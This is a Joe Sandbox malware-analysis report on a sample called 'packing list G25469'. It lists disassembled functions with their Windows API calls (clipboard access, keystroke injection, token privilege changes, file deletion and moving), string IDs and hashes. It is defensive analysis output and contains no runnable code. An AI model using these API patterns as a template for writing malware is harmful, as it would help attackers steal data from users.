                                                  • Instruction Fuzzy Hash: CE1182729456109BD7127FA4D842B6D77E09F41333F1943C0EC345B1E2DBB48D088BA1
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.2106201149.0000000000B31000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B30000, based on PE: true
                                                  • Associated: 00000000.00000002.2106179367.0000000000B30000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2106264566.0000000000BBD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2106264566.0000000000BDE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2106312192.0000000000BEA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2106329890.0000000000BF4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_b30000_packing list G25469.jbxd
                                                  Similarity
                                                  • API ID: LibraryLoad
                                                  • String ID:
                                                  • API String ID: 1029625771-0
                                                  • Opcode ID: e908df7db2011151d19b897d4a4948494f90a1a3426dd436a38c65c5f4b6a17e
                                                  • Instruction ID: a1b33fcd66b02bd570afb4e93f8c35ecdb88a028b44c99bd7670a6ca565f01dd
                                                  • Opcode Fuzzy Hash: e908df7db2011151d19b897d4a4948494f90a1a3426dd436a38c65c5f4b6a17e
                                                  • Instruction Fuzzy Hash: 40013631504109AECF05EF64C8918FFBFF4EF11344F1080A9B565A7195EB31AA49DF60
                                                  APIs
                                                  • __lock_file.LIBCMT ref: 00B52AED
                                                    • Part of subcall function 00B57C0E: __getptd_noexit.LIBCMT ref: 00B57C0E
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.2106201149.0000000000B31000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B30000, based on PE: true
                                                  • Associated: 00000000.00000002.2106179367.0000000000B30000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2106264566.0000000000BBD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2106264566.0000000000BDE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2106312192.0000000000BEA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2106329890.0000000000BF4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_b30000_packing list G25469.jbxd
                                                  Similarity
                                                  • API ID: __getptd_noexit__lock_file
                                                  • String ID:
                                                  • API String ID: 2597487223-0
                                                  • Opcode ID: ec0b9a27fb70f52aa08feb0fbec6348c89e2285b40d651721407fa5a0bc0f4cf
                                                  • Instruction ID: 37c482931578a95cbee34282e015467497a4226db07c96bf59fac9667de70872
                                                  • Opcode Fuzzy Hash: ec0b9a27fb70f52aa08feb0fbec6348c89e2285b40d651721407fa5a0bc0f4cf
                                                  • Instruction Fuzzy Hash: 7EF0C231902605AADF22AF748C0639F37E1BF01322F1444D5BC109B1A1D7788A5ADB41
                                                  APIs
                                                  • FreeLibrary.KERNEL32(?,?,?,?,?,00B339FE,?,00000001), ref: 00B34286
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.2106201149.0000000000B31000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B30000, based on PE: true
                                                  • Associated: 00000000.00000002.2106179367.0000000000B30000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2106264566.0000000000BBD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2106264566.0000000000BDE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2106312192.0000000000BEA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2106329890.0000000000BF4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_b30000_packing list G25469.jbxd
                                                  Similarity
                                                  • API ID: FreeLibrary
                                                  • String ID:
                                                  • API String ID: 3664257935-0
                                                  • Opcode ID: c8959419d2f8adda347e788d906d68e6066fdc08b1ecfde3af78af2cca50ef50
                                                  • Instruction ID: b745f8001ff4c4565cd1b08c2e58a6c40b87f15099fb767c177d1abfe1667691
                                                  • Opcode Fuzzy Hash: c8959419d2f8adda347e788d906d68e6066fdc08b1ecfde3af78af2cca50ef50
                                                  • Instruction Fuzzy Hash: 1FF08570524302DFCB348F64E880813BBE0FF043253208AAEF1C6A2620C772A840DF40
                                                  APIs
                                                  • GetLongPathNameW.KERNELBASE(?,?,00007FFF), ref: 00B340C6
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.2106201149.0000000000B31000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B30000, based on PE: true
                                                  • Associated: 00000000.00000002.2106179367.0000000000B30000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2106264566.0000000000BBD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2106264566.0000000000BDE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2106312192.0000000000BEA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2106329890.0000000000BF4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_b30000_packing list G25469.jbxd
                                                  Similarity
                                                  • API ID: LongNamePath
                                                  • String ID:
                                                  • API String ID: 82841172-0
                                                  • Opcode ID: ad96543427d65b94622023594dd59039b755c4a700493357fd4174a550500b81
                                                  • Instruction ID: 25709e3938e8d89d9f5daf081b55afe56e9ea650cdc54c306ffa7fcd7c72c341
                                                  • Opcode Fuzzy Hash: ad96543427d65b94622023594dd59039b755c4a700493357fd4174a550500b81
                                                  • Instruction Fuzzy Hash: 7CE0C2366002246BC711A658CC46FFA77EDDF886A0F0941F5F909E7244EEA4AD818690
                                                  APIs
                                                  • Sleep.KERNELBASE(000001F4), ref: 01349A31
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.2106729972.0000000001347000.00000040.00000020.00020000.00000000.sdmp, Offset: 01347000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_1347000_packing list G25469.jbxd
                                                  Similarity
                                                  • API ID: Sleep
                                                  • String ID:
                                                  • API String ID: 3472027048-0
                                                  • Opcode ID: 368835ae2f5fba710e6c01549c2017e46dd928bc4d187f44ede00cceab054826
                                                  • Instruction ID: 1a42b101e89cc944be7a7ab6a3b12027d42c690d12c0bf827383f085c0e91573
                                                  • Opcode Fuzzy Hash: 368835ae2f5fba710e6c01549c2017e46dd928bc4d187f44ede00cceab054826
                                                  • Instruction Fuzzy Hash: 6AE0BF7494010DDFDB00EFA4D54969E7FB4EF04301F100261FD0592281D63099508A62
                                                  APIs
                                                    • Part of subcall function 00B4B34E: GetWindowLongW.USER32(?,000000EB), ref: 00B4B35F
                                                  • DefDlgProcW.USER32(?,0000004E,?,?,?,?,?,?,?), ref: 00B9F87D
                                                  • SendMessageW.USER32(?,0000130B,00000000,00000000), ref: 00B9F8DC
                                                  • GetWindowLongW.USER32(?,000000F0), ref: 00B9F919
                                                  • SendMessageW.USER32(?,0000110A,00000009,00000000), ref: 00B9F940
                                                  • SendMessageW.USER32 ref: 00B9F966
                                                  • _wcsncpy.LIBCMT ref: 00B9F9D2
                                                  • GetKeyState.USER32(00000011), ref: 00B9F9F3
                                                  • GetKeyState.USER32(00000009), ref: 00B9FA00
                                                  • SendMessageW.USER32(?,0000130B,00000000,00000000), ref: 00B9FA16
                                                  • GetKeyState.USER32(00000010), ref: 00B9FA20
                                                  • SendMessageW.USER32(?,0000110A,00000009,00000000), ref: 00B9FA4F
                                                  • SendMessageW.USER32 ref: 00B9FA72
                                                  • SendMessageW.USER32(?,00001030,?,00B9E059), ref: 00B9FB6F
                                                  • ImageList_SetDragCursorImage.COMCTL32(00000000,00000000,00000000,?,?,?,?), ref: 00B9FB85
                                                  • ImageList_BeginDrag.COMCTL32(00000000,000000F8,000000F0), ref: 00B9FB96
                                                  • SetCapture.USER32(?), ref: 00B9FB9F
                                                  • ClientToScreen.USER32(?,?), ref: 00B9FC03
                                                  • ImageList_DragEnter.COMCTL32(00000000,?,?), ref: 00B9FC0F
                                                  • InvalidateRect.USER32(?,00000000,00000001,?,?,?,?), ref: 00B9FC29
                                                  • ReleaseCapture.USER32 ref: 00B9FC34
                                                  • GetCursorPos.USER32(?), ref: 00B9FC69
                                                  • ScreenToClient.USER32(?,?), ref: 00B9FC76
                                                  • SendMessageW.USER32(?,00001012,00000000,?), ref: 00B9FCD8
                                                  • SendMessageW.USER32 ref: 00B9FD02
                                                  • SendMessageW.USER32(?,00001111,00000000,?), ref: 00B9FD41
                                                  • SendMessageW.USER32 ref: 00B9FD6C
                                                  • SendMessageW.USER32(?,0000110B,00000009,00000000), ref: 00B9FD84
                                                  • SendMessageW.USER32(?,0000110B,00000009,?), ref: 00B9FD8F
                                                  • GetCursorPos.USER32(?), ref: 00B9FDB0
                                                  • ScreenToClient.USER32(?,?), ref: 00B9FDBD
                                                  • GetParent.USER32(?), ref: 00B9FDD9
                                                  • SendMessageW.USER32(?,00001012,00000000,?), ref: 00B9FE3F
                                                  • SendMessageW.USER32 ref: 00B9FE6F
                                                  • ClientToScreen.USER32(?,?), ref: 00B9FEC5
                                                  • TrackPopupMenuEx.USER32(?,00000000,?,?,?,00000000), ref: 00B9FEF1
                                                  • SendMessageW.USER32(?,00001111,00000000,?), ref: 00B9FF19
                                                  • SendMessageW.USER32 ref: 00B9FF3C
                                                  • ClientToScreen.USER32(?,?), ref: 00B9FF86
                                                  • TrackPopupMenuEx.USER32(?,00000080,?,?,?,00000000), ref: 00B9FFB6
                                                  • GetWindowLongW.USER32(?,000000F0), ref: 00BA004B
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.2106201149.0000000000B31000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B30000, based on PE: true
                                                  • Associated: 00000000.00000002.2106179367.0000000000B30000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2106264566.0000000000BBD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2106264566.0000000000BDE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2106312192.0000000000BEA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2106329890.0000000000BF4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_b30000_packing list G25469.jbxd
                                                  Similarity
                                                  • API ID: MessageSend$ClientScreen$Image$CursorDragList_LongStateWindow$CaptureMenuPopupTrack$BeginEnterInvalidateParentProcRectRelease_wcsncpy
                                                  • String ID: @GUI_DRAGID$F
                                                  • API String ID: 2516578528-4164748364
                                                  • Opcode ID: 5945abe1ca79be65ee8ab7b016fb4bb4222961892aed003e5498b40d674fd28b
                                                  • Instruction ID: 4c11a2c6670a32754ee6185109e684465af2834278ff5f613e7dbe77bf125d3c
                                                  • Opcode Fuzzy Hash: 5945abe1ca79be65ee8ab7b016fb4bb4222961892aed003e5498b40d674fd28b
                                                  • Instruction Fuzzy Hash: 33327770604246EFDB20CF68C884ABABBE4FB49364F140AB9F655C72B1DB71D944CB51
                                                  APIs
                                                  • SendMessageW.USER32(?,00000400,00000000,00000000), ref: 00B9B1CD
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.2106201149.0000000000B31000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B30000, based on PE: true
                                                  • Associated: 00000000.00000002.2106179367.0000000000B30000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2106264566.0000000000BBD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2106264566.0000000000BDE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2106312192.0000000000BEA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2106329890.0000000000BF4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_b30000_packing list G25469.jbxd
                                                  Similarity
                                                  • API ID: MessageSend
                                                  • String ID: %d/%02d/%02d
                                                  • API String ID: 3850602802-328681919
                                                  • Opcode ID: dea24ff8156f6f34e07cf52a9496ef42a0ee51a7f9da7bb29a303f473752a705
                                                  • Instruction ID: 763c2000d53acfbb692bf574f50dcafd6d2c406152a7e40d06c7eedb97b71f7c
                                                  • Opcode Fuzzy Hash: dea24ff8156f6f34e07cf52a9496ef42a0ee51a7f9da7bb29a303f473752a705
                                                  • Instruction Fuzzy Hash: F712CE71500218ABEF249F64DD49FAA7BF8FF85710F1042A9F916EB2D0DBB48941CB61
                                                  APIs
                                                  • GetForegroundWindow.USER32(00000000,00000000), ref: 00B4EB4A
                                                  • FindWindowW.USER32(Shell_TrayWnd,00000000), ref: 00BA3AEA
                                                  • IsIconic.USER32(000000FF), ref: 00BA3AF3
                                                  • ShowWindow.USER32(000000FF,00000009), ref: 00BA3B00
                                                  • SetForegroundWindow.USER32(000000FF), ref: 00BA3B0A
                                                  • GetWindowThreadProcessId.USER32(00000000,00000000), ref: 00BA3B20
                                                  • GetCurrentThreadId.KERNEL32 ref: 00BA3B27
                                                  • GetWindowThreadProcessId.USER32(000000FF,00000000), ref: 00BA3B33
                                                  • AttachThreadInput.USER32(000000FF,00000000,00000001), ref: 00BA3B44
                                                  • AttachThreadInput.USER32(000000FF,00000000,00000001), ref: 00BA3B4C
                                                  • AttachThreadInput.USER32(00000000,?,00000001), ref: 00BA3B54
                                                  • SetForegroundWindow.USER32(000000FF), ref: 00BA3B57
                                                  • MapVirtualKeyW.USER32(00000012,00000000), ref: 00BA3B6C
                                                  • keybd_event.USER32(00000012,00000000), ref: 00BA3B77
                                                  • MapVirtualKeyW.USER32(00000012,00000000), ref: 00BA3B81
                                                  • keybd_event.USER32(00000012,00000000), ref: 00BA3B86
                                                  • MapVirtualKeyW.USER32(00000012,00000000), ref: 00BA3B8F
                                                  • keybd_event.USER32(00000012,00000000), ref: 00BA3B94
                                                  • MapVirtualKeyW.USER32(00000012,00000000), ref: 00BA3B9E
                                                  • keybd_event.USER32(00000012,00000000), ref: 00BA3BA3
                                                  • SetForegroundWindow.USER32(000000FF), ref: 00BA3BA6
                                                  • AttachThreadInput.USER32(000000FF,?,00000000), ref: 00BA3BCD
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.2106201149.0000000000B31000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B30000, based on PE: true
                                                  • Associated: 00000000.00000002.2106179367.0000000000B30000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2106264566.0000000000BBD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2106264566.0000000000BDE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2106312192.0000000000BEA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2106329890.0000000000BF4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_b30000_packing list G25469.jbxd
                                                  Similarity
                                                  • API ID: Window$Thread$AttachForegroundInputVirtualkeybd_event$Process$CurrentFindIconicShow
                                                  • String ID: Shell_TrayWnd
                                                  • API String ID: 4125248594-2988720461
                                                  • Opcode ID: 9499b3478fe023c3ab928c161964b23c6b0ebdb5b3aa9a61fe4631e2c3b558ac
                                                  • Instruction ID: dfa74d42b14ba414cb29ff25cc2bd7dcb6a8b907d6d71f401375a3e082fe6b65
                                                  • Opcode Fuzzy Hash: 9499b3478fe023c3ab928c161964b23c6b0ebdb5b3aa9a61fe4631e2c3b558ac
                                                  • Instruction Fuzzy Hash: 9B317271A402187BEB305F659C89F7E7EACEB44B50F104165FA05EB1D0EAF59D00AAB0
                                                  APIs
                                                    • Part of subcall function 00B6B134: LookupPrivilegeValueW.ADVAPI32(00000000,00000000,00000004), ref: 00B6B180
                                                    • Part of subcall function 00B6B134: AdjustTokenPrivileges.ADVAPI32(?,00000000,00000000,?,00000000,?), ref: 00B6B1AD
                                                    • Part of subcall function 00B6B134: GetLastError.KERNEL32 ref: 00B6B1BA
                                                  • _memset.LIBCMT ref: 00B6AD08
                                                  • DuplicateTokenEx.ADVAPI32(?,00000000,00000000,00000002,00000001,?,?,?,?,00000001,?,?), ref: 00B6AD5A
                                                  • CloseHandle.KERNEL32(?), ref: 00B6AD6B
                                                  • OpenWindowStationW.USER32(winsta0,00000000,00060000), ref: 00B6AD82
                                                  • GetProcessWindowStation.USER32 ref: 00B6AD9B
                                                  • SetProcessWindowStation.USER32(00000000), ref: 00B6ADA5
                                                  • OpenDesktopW.USER32(default,00000000,00000000,00060081), ref: 00B6ADBF
                                                    • Part of subcall function 00B6AB84: AdjustTokenPrivileges.ADVAPI32(?,00000000,?,00000000,00000000,00000000,?,00B6ACC0), ref: 00B6AB99
                                                    • Part of subcall function 00B6AB84: CloseHandle.KERNEL32(?,?,00B6ACC0), ref: 00B6ABAB
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.2106201149.0000000000B31000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B30000, based on PE: true
                                                  • Associated: 00000000.00000002.2106179367.0000000000B30000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2106264566.0000000000BBD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2106264566.0000000000BDE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2106312192.0000000000BEA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2106329890.0000000000BF4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_b30000_packing list G25469.jbxd
                                                  Similarity
                                                  • API ID: StationTokenWindow$AdjustCloseHandleOpenPrivilegesProcess$DesktopDuplicateErrorLastLookupPrivilegeValue_memset
                                                  • String ID: $default$winsta0
                                                  • API String ID: 2063423040-1027155976
                                                  • Opcode ID: c797b00c5239f1ec6a3063e7e2b6ce5afe4dd01214d3b4e20f26ca0a3e669c3b
                                                  • Instruction ID: e60f37f0039d9efbd0434053cac8ee75919989a6b2df007ac953eda4fa65a95b
                                                  • Opcode Fuzzy Hash: c797b00c5239f1ec6a3063e7e2b6ce5afe4dd01214d3b4e20f26ca0a3e669c3b
                                                  • Instruction Fuzzy Hash: 27817F71900209AFDF119FA4CC45AEE7BB8FF04304F1481A9F915B2161EB7A8E55DF62
                                                  APIs
                                                    • Part of subcall function 00B76EBB: GetFullPathNameW.KERNEL32(00000000,00007FFF,?,?,?,?,?,?,00B75FA6,?), ref: 00B76ED8
                                                    • Part of subcall function 00B76EBB: GetFullPathNameW.KERNEL32(?,00007FFF,?,?,?,?,?,00B75FA6,?), ref: 00B76EF1
                                                    • Part of subcall function 00B7725E: __wsplitpath.LIBCMT ref: 00B7727B
                                                    • Part of subcall function 00B7725E: __wsplitpath.LIBCMT ref: 00B7728E
                                                    • Part of subcall function 00B772CB: GetFileAttributesW.KERNEL32(?,00B76019), ref: 00B772CC
                                                  • _wcscat.LIBCMT ref: 00B76149
                                                  • _wcscat.LIBCMT ref: 00B76167
                                                  • __wsplitpath.LIBCMT ref: 00B7618E
                                                  • FindFirstFileW.KERNEL32(?,?), ref: 00B761A4
                                                  • _wcscpy.LIBCMT ref: 00B76209
                                                  • _wcscat.LIBCMT ref: 00B7621C
                                                  • _wcscat.LIBCMT ref: 00B7622F
                                                  • lstrcmpiW.KERNEL32(?,?), ref: 00B7625D
                                                  • DeleteFileW.KERNEL32(?), ref: 00B7626E
                                                  • MoveFileW.KERNEL32(?,?), ref: 00B76289
                                                  • MoveFileW.KERNEL32(?,?), ref: 00B76298
                                                  • CopyFileW.KERNEL32(?,?,00000000), ref: 00B762AD
                                                  • DeleteFileW.KERNEL32(?), ref: 00B762BE
                                                  • FindNextFileW.KERNEL32(00000000,00000010), ref: 00B762E1
                                                  • FindClose.KERNEL32(00000000), ref: 00B762FD
                                                  • FindClose.KERNEL32(00000000), ref: 00B7630B
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.2106201149.0000000000B31000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B30000, based on PE: true
                                                  • Associated: 00000000.00000002.2106179367.0000000000B30000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2106264566.0000000000BBD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2106264566.0000000000BDE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2106312192.0000000000BEA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2106329890.0000000000BF4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_b30000_packing list G25469.jbxd
                                                  Similarity
                                                  • API ID: File$Find_wcscat$__wsplitpath$CloseDeleteFullMoveNamePath$AttributesCopyFirstNext_wcscpylstrcmpi
                                                  • String ID: \*.*
                                                  • API String ID: 1917200108-1173974218
                                                  • Opcode ID: a17087c16291772a948ab44c2e3097e12d1110251673918cafe3bde5c58709c8
                                                  • Instruction ID: 75cd185edd95012a626c1796397a38de8abb922a77fa536de14600b6b9414407
                                                  • Opcode Fuzzy Hash: a17087c16291772a948ab44c2e3097e12d1110251673918cafe3bde5c58709c8
                                                  • Instruction Fuzzy Hash: EE51207280815C6ACB21EB95CC44EEB77FCAF05300F0545E6E599E3142EE769B498FA4
                                                  APIs
                                                  • OpenClipboard.USER32(00BCDC00), ref: 00B86B36
                                                  • IsClipboardFormatAvailable.USER32(0000000D), ref: 00B86B44
                                                  • GetClipboardData.USER32(0000000D), ref: 00B86B4C
                                                  • CloseClipboard.USER32 ref: 00B86B58
                                                  • GlobalLock.KERNEL32(00000000), ref: 00B86B74
                                                  • CloseClipboard.USER32 ref: 00B86B7E
                                                  • GlobalUnlock.KERNEL32(00000000), ref: 00B86B93
                                                  • IsClipboardFormatAvailable.USER32(00000001), ref: 00B86BA0
                                                  • GetClipboardData.USER32(00000001), ref: 00B86BA8
                                                  • GlobalLock.KERNEL32(00000000), ref: 00B86BB5
                                                  • GlobalUnlock.KERNEL32(00000000), ref: 00B86BE9
                                                  • CloseClipboard.USER32 ref: 00B86CF6
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.2106201149.0000000000B31000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B30000, based on PE: true
                                                  • Associated: 00000000.00000002.2106179367.0000000000B30000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2106264566.0000000000BBD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2106264566.0000000000BDE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2106312192.0000000000BEA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2106329890.0000000000BF4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_b30000_packing list G25469.jbxd
                                                  Similarity
                                                  • API ID: Clipboard$Global$Close$AvailableDataFormatLockUnlock$Open
                                                  • String ID:
                                                  • API String ID: 3222323430-0
                                                  • Opcode ID: 95da5ff5cb8fd3247be37851607bb99e437cdbd83597fa49805c9dd1acbc4fbd
                                                  • Instruction ID: 77146a8f6295e759cf1e360b56eabead70a70a00062bf3f553f947c4aa4fceaf
                                                  • Opcode Fuzzy Hash: 95da5ff5cb8fd3247be37851607bb99e437cdbd83597fa49805c9dd1acbc4fbd
                                                  • Instruction Fuzzy Hash: 69517D71200201ABD314BFA4DD86F6E77E8EB98B00F104669F556D72E1EFB4D905CB62
                                                  APIs
                                                  • FindFirstFileW.KERNEL32(?,?), ref: 00B7F62B
                                                  • FindClose.KERNEL32(00000000), ref: 00B7F67F
                                                  • FileTimeToLocalFileTime.KERNEL32(?,?), ref: 00B7F6A4
                                                  • FileTimeToLocalFileTime.KERNEL32(?,?), ref: 00B7F6BB
                                                  • FileTimeToSystemTime.KERNEL32(?,?), ref: 00B7F6E2
                                                  • __swprintf.LIBCMT ref: 00B7F72E
                                                  • __swprintf.LIBCMT ref: 00B7F767
                                                  • __swprintf.LIBCMT ref: 00B7F7BB
                                                    • Part of subcall function 00B5172B: __woutput_l.LIBCMT ref: 00B51784
                                                  • __swprintf.LIBCMT ref: 00B7F809
                                                  • __swprintf.LIBCMT ref: 00B7F858
                                                  • __swprintf.LIBCMT ref: 00B7F8A7
                                                  • __swprintf.LIBCMT ref: 00B7F8F6
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.2106201149.0000000000B31000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B30000, based on PE: true
                                                  • Associated: 00000000.00000002.2106179367.0000000000B30000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2106264566.0000000000BBD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2106264566.0000000000BDE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2106312192.0000000000BEA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2106329890.0000000000BF4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_b30000_packing list G25469.jbxd
                                                  Similarity
                                                  • API ID: __swprintf$FileTime$FindLocal$CloseFirstSystem__woutput_l
                                                  • String ID: %02d$%4d$%4d%02d%02d%02d%02d%02d
                                                  • API String ID: 835046349-2428617273
                                                  • Opcode ID: 06eb33ebdeb0afb31e4d3035a574f9a8127bd394bf4876b2d1bef12058731099
                                                  • Instruction ID: bc3a80376ce446cd15f85c7ffd4a3ea498d6a92e12b010a48660a488a6575c42
                                                  • Opcode Fuzzy Hash: 06eb33ebdeb0afb31e4d3035a574f9a8127bd394bf4876b2d1bef12058731099
                                                  • Instruction Fuzzy Hash: EEA11FB2508344ABC314EB95C885DAFB7ECEF98700F404D6DF59583192EB34DA49DB62
                                                  APIs
                                                  • FindFirstFileW.KERNEL32(?,?,75918FB0,?,00000000), ref: 00B81B50
                                                  • _wcscmp.LIBCMT ref: 00B81B65
                                                  • _wcscmp.LIBCMT ref: 00B81B7C
                                                  • GetFileAttributesW.KERNEL32(?), ref: 00B81B8E
                                                  • SetFileAttributesW.KERNEL32(?,?), ref: 00B81BA8
                                                  • FindNextFileW.KERNEL32(00000000,?), ref: 00B81BC0
                                                  • FindClose.KERNEL32(00000000), ref: 00B81BCB
                                                  • FindFirstFileW.KERNEL32(*.*,?), ref: 00B81BE7
                                                  • _wcscmp.LIBCMT ref: 00B81C0E
                                                  • _wcscmp.LIBCMT ref: 00B81C25
                                                  • SetCurrentDirectoryW.KERNEL32(?), ref: 00B81C37
                                                  • SetCurrentDirectoryW.KERNEL32(00BE39FC), ref: 00B81C55
                                                  • FindNextFileW.KERNEL32(00000000,00000010), ref: 00B81C5F
                                                  • FindClose.KERNEL32(00000000), ref: 00B81C6C
                                                  • FindClose.KERNEL32(00000000), ref: 00B81C7C
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.2106201149.0000000000B31000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B30000, based on PE: true
                                                  • Associated: 00000000.00000002.2106179367.0000000000B30000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2106264566.0000000000BBD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2106264566.0000000000BDE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2106312192.0000000000BEA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2106329890.0000000000BF4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_b30000_packing list G25469.jbxd
                                                  Similarity
                                                  • API ID: Find$File$_wcscmp$Close$AttributesCurrentDirectoryFirstNext
                                                  • String ID: *.*
                                                  • API String ID: 1803514871-438819550
                                                  • Opcode ID: 8d98a9a926773bdc4df287f9b8d40b24a6f53ea9c1f51a04064fb79c1520caa5
                                                  • Instruction ID: 2815a3694982db6c4b59425c0a69aecdfcdeb6ded6f84d5df1fa6938e5bbfdf9
                                                  • Opcode Fuzzy Hash: 8d98a9a926773bdc4df287f9b8d40b24a6f53ea9c1f51a04064fb79c1520caa5
                                                  • Instruction Fuzzy Hash: F931A5315012196BDF14ABA8DC49BEE77ECEF05310F104AE5E911E30A0EB74DA46CF64
                                                  APIs
